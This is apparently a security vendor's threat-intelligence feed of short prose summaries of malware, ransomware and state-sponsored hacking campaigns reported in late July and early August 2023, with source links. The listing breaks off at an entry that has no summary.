- Intel Source:
- Any.Run
- Intel Name:
- Remcos_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Any.Run malware hunting service recorded a video for Remcos RAT execution and analysis. Remcos is a remote access trojan – a malware used to take remote control over infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security. Remcos trojan can be delivered in different forms. Based on RAT’s analysis, it can be spread as an executable file with the name that should convince users to open it, or it pretends to bne a Microsoft Word file that exploits vulnerabilities.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Play_ransomware_activity
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- TrendMicro have observed the Play ransomware group amplified their activity with a number of new tools and exploits, including the vulnerabilities ProxyNotShell, OWASSRF, and a Microsoft Exchange Server Remote Code Execution. More recently, it’s also begun to use new tools like Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
—
- Intel Source:
- Any Run
- Intel Name:
- Redline_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen my spam trap caught an e-mail with LNK attachment, the e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient.
Source:
https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/
—
- Intel Source:
- McAfee
- Intel Name:
- The_Back_to_School_Scams
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- McAfee Labs analysts has discovered the following PDFs targeting back-to-school trends. Their article warns the parents on what to educate their children on and how not to fall victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/
—
- Intel Source:
- MetaBase Q
- Intel Name:
- Botnet_Fenix_new_botnet
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called as “Fenix,” which specifically targets users accessing government services, particularly tax-paying individuals in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Attack_Method_of_Rhysida_Ransomware
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group’s emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.
Source:
https://socradar.io/threat-profile-rhysida-ransomware/
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Rilide_Stealer_Version
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
—
- Intel Source:
- Securelist
- Intel Name:
- Emotet_DarkGate_and_LokiBot_new_analyses
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
Source:
https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/
—
- Intel Source:
- ASEC
- Intel Name:
- Sliver_C2_malware_being_distributed
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed similar malware from the past SparkRAT being distributed while being pretending as setup files for Korean VPN service providers and marketing program producers. Contrary the past cases where SparkRAT was used, Sliver C2 was used in the recent attacks and techniques to avoid detection were employed.
—
- Intel Source:
- ASEC
- Intel Name:
- Linux_Systems_Are_Affected_by_Reptile_Malware
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and Port Knocking capabilities. It examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
- Date of Scan:
- 2023-08-03
- Impact:
- MEDIUM
- Summary:
- In “highly targeted social engineering attacks,” hackers within the Russian military utilized Microsoft Teams discussions as phishing baits. The IT giant announced on Wednesday that it has discovered a campaign by the well-known Russian hacker collective Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation’s Foreign Intelligence Service.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Researchers from Recorded Future have identified the latest campaign from BlueCharlie, the group completely switched up its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf
—
- Intel Source:
- Sentilone
- Intel Name:
- Illicit_Brand_Impersonation
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Santilone researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they shared examples of opportunistic and targeted threat actors impersonating trusted brands and they can make use of new tooling for the purposes of hunting and tracking them moving forward.
Source:
https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/
—
- Intel Source:
- CISA
- Intel Name:
- Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
- Date of Scan:
- 2023-08-02
- Impact:
- MEDIUM
- Summary:
- In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Variant_of_SkidMap_Targeting_Redis
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that appeared again less than two weeks later. Only open Redis instances are targeted by SkidMap (also known as “NO AUTH”). They haven’t noticed brute-force attacks coming from the precise IP where the initial attack started.
—
- Intel Source:
- PaloAlto
- Intel Name:
- NodeStealer_2_0_The_Python_Version
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines
Source:
https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/
—
- Intel Source:
- Cado Security
- Intel Name:
- New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name “P2Pinfect” by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.
—
- Intel Source:
- Halcyon
- Intel Name:
- Ransomware_Command_and_Control_Providers_report
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- The Halcyon researchers shared their research that observed new techniques used to unmask yet another Ransomware Economy player that is speed up ransomware attacks and state-sponsored APT operations like Command-and-Control Providers (C2P) who sell services to threat actors while assuming a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the pioneer to major ransomware campaigns and other advanced attacks. Halcyon also identifies two new, previously undisclosed ransomware affiliates Halcyon named them as Ghost Clown and Space Kook that currently deploy BlackBasta and Royal, respectively.
—
- Intel Source:
- Avast
- Intel Name:
- The_Unknown_Risks_of_Dot_Zip_Domains
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Cybercriminals have begun using.zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to research, one-third of the top 30.zip domains blacklisted by threat detection engines misuse the names of well-known IT firms like Microsoft, Google, Amazon, and Paypal to deceive users into thinking they are files from reputable businesses.
Source:
https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/
—
- Intel Source:
- PaloAlto
- Intel Name:
- URLs_That_Deliver_Ransomware
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their inventions past victims’ defenses. Additionally, they are utilizing more dynamic behaviors to spread their malware. Threat actors frequently switch hostnames, paths, filenames, or a combination of all three to disperse ransomware, in addition to following the tried-and-true method of deploying polymorphic variants of their ransomware.
Source:
https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz
—
- Intel Source:
- Team-Cymru
- Intel Name:
- The_IcedID_BackConnect_Protocol_Internals
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID’s BackConnect protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2
—
- Intel Source:
- Proofpoint
- Intel Name:
- WikiLoader_Favors_Complex_Evasion
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally discovered in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed numerous succeeding initiatives, the majority of which had Italian groups as their target.
Source:
https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion
—
- Intel Source:
- Cyble
- Intel Name:
- The_Cunning_XWorms_Multi_Staged_Attack
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.
Source:
https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Threat_Actors_Abusing_the_Ad_Network
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements to hijack searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor(s) has successfully used this type of attack since late May 2023. Based on their threat insights, attackers seem to exclusively focus on North America. Until now, we have identified six target organizations in the US and one in Canada.
—
- Intel Source:
- CISA
- Intel Name:
- v2_SUBMARINE_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- The US Department of Homeland Security (CISA) has released a report on a new type of backdoor malware, which could be used by hackers to gain access to a network of secure email addresses. CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 – 9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209a
—
- Intel Source:
- CISA
- Intel Name:
- SEASPY_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209b
—
- Intel Source:
- Dr. Web
- Intel Name:
- Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
- Date of Scan:
- 2023-07-31
- Impact:
- LOW
- Summary:
- Dr.Web researchers have observed that threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote trojans tools like Remcos RAT.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have detected an ongoing cyber assault campaign that is targeting Korean-speaking people by using document lures with American military themes to fool them into launching malware on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
—
- Intel Source:
- Blackberry
- Intel Name:
- Behavioral_detection_tips_for_the_RomCom_campaign
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.
Source:
https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection
—
- Intel Source:
- Sophos
- Intel Name:
- The_discover_of_apps_targeting_Iranian_bank_customers
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.
Source:
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
—
- Intel Source:
- Sophos
- Intel Name:
- A_New_Malicious_Campaign_Distributing_IT_Tools
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.
Source:
https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/
—
- Intel Source:
- Recorded Future
- Intel Name:
- BlueBravo_Attacks_European_Diplomatic_Entities
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions around Eastern Europe. This illustrates the threat’s ongoing evolution. The use of lawful internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- In_depth_Campaign_Analysis_of_QakBot
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.
—
- Intel Source:
- Trellix
- Intel Name:
- Exploiting_of_the_search_ms_URI_Protocol_Handler
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
—
- Intel Source:
- Aquasec
- Intel Name:
- Tomcat_attacked_by_Mirai_Malware_and_beyond
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the misconfiguration of Apache Tomcat, the impact of the malware ‘l4sd4sx64’, and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.
Source:
https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Deep_Investigation_of_JumpCloud_System_Breach
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People’s Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.
Source:
https://www.mandiant.com/resources/blog/north-korea-supply-chain
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Threat_Group_Attacking_Windows_Servers
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.
—
- Intel Source:
- Splunk
- Intel Name:
- The_Analysis_of_Amadey_Threat
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.
Source:
https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
—
- Intel Source:
- Sygnia
- Intel Name:
- Casbaneiro_Infection_Chain_is_Back
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.
Source:
https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Jade_Sleet_Storm_0954_Social_Engineering_Campaign
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- GitHub has observed a Jade Sleet social engineering campaign which targets employees of technology firms, those who are connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originally from North Korea and specializes in targeting cryptocurrency-related organizations. They utilize a range of tactics lke the development of applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and Electron frameworks to create implants for both Microsoft Windows and Mac-based systems.
—
- Intel Source:
- ASEC
- Intel Name:
- PurpleFox_Loader_Distributing_via_MS_SQL_Server
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.
—
- Intel Source:
- Fortinet
- Intel Name:
- Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransom group demands payment in exchange for file decryption and to prevent the public exposure of stolen information
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_Cloud_Compute_Resource_Abuse
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Microsoft researchers have observed an attack that is targeting organizations that incurred more than $300,000 in computing fees due to cryptojacking attacks
—
- Intel Source:
- PaloAlto
- Intel Name:
- Diving_Deep_into_Mallox_Ransomware
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks.
Source:
https://unit42.paloaltonetworks.com/mallox-ransomware/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx’s Supply Chain Intelligence offers protection and ongoing tracking.
Source:
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deceptive_and_Evolving_Malware_Tool
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyfirma has identified a new threat in the cybersecurity landscape – Attacker-Crypter. This powerful tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.
—
- Intel Source:
- ICS CERT
- Intel Name:
- Attack_Tactics_Against_Industrial_Organizations
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers’ goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.
Source:
https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Cloud researchers at Unit 42 have found a fresh peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently utilized in cloud environments.
Source:
https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Scammers_Targeting_Universities_With_Bioscience_Lures
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have seen a campaign that targets university students in North America in late May 2023 using a variety of email lures with job-related themes. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, as well as a few other unrelated ones. The operation went on until June 2023.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- CYFIRMA research team have observed Poop69 ransomware appearing in the wild, and shortly after that, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor, which has become popular recently due to its fake Windows update method.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered the spread of many DDoS botnets that are taking use of the Zyxel vulnerability (CVE-2023-28771). It is possible for an unauthorized attacker to execute arbitrary code by sending a specially designed packet to the targeted device, which is how this vulnerability is defined by a command injection bug impacting several firewall models.
Source:
https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771
—
- Intel Source:
- Sentilone
- Intel Name:
- JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Sentilone shared the details after investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, there are updated IOCs released and researchers associated the cluster of threat activity to a North Korean state sponsored APT. The IOCs are linked to a wide variety of activity that Sentilone attributes to DPRK, overall centric to the supply chain targeting approach seen in previous campaigns.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a spearphishing effort that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The effort began in January 2023 and has primarily targeted Ukrainian government organizations, however it has also targeted Spain, Indonesia, and France.
—
- Intel Source:
- Avast
- Intel Name:
- The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- In a recent rise in malware activity, malicious AutoHotkey scripts that started the HotRat virus on victims’ PCs were bundled with illicit software, according to Avast researchers. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered that in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking, the specificity of CAPIBAR is the presence of a server part, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool, effectively converting a legitimate server into a malware control center.
—
- Intel Source:
- HP Labs
- Intel Name:
- Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. Also, seen other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.
Source:
https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true
—
- Intel Source:
- Fotinet
- Intel Name:
- Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed new ‘.ZIP’ Top-Level Domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they’re actually visiting malicious websites.
Source:
https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals
—
- Intel Source:
- Securilist
- Intel Name:
- Outlook_Vulnerability_and_Clever_Attacker_Tactics
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Securilist shared retheir analyses CVE-2023-23397 vulnerability in Microsoft Outlook for Windows allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.
Source:
https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/
—
- Intel Source:
- JPCERT/CC
- Intel Name:
- DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- JPCERT/CC has shared about DangerousPassword, a targeted attack group, is targeting developers of cryptocurrency exchange businesses on Windows, macOS, and Linux environments. They use Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.
Source:
https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.
Source:
https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
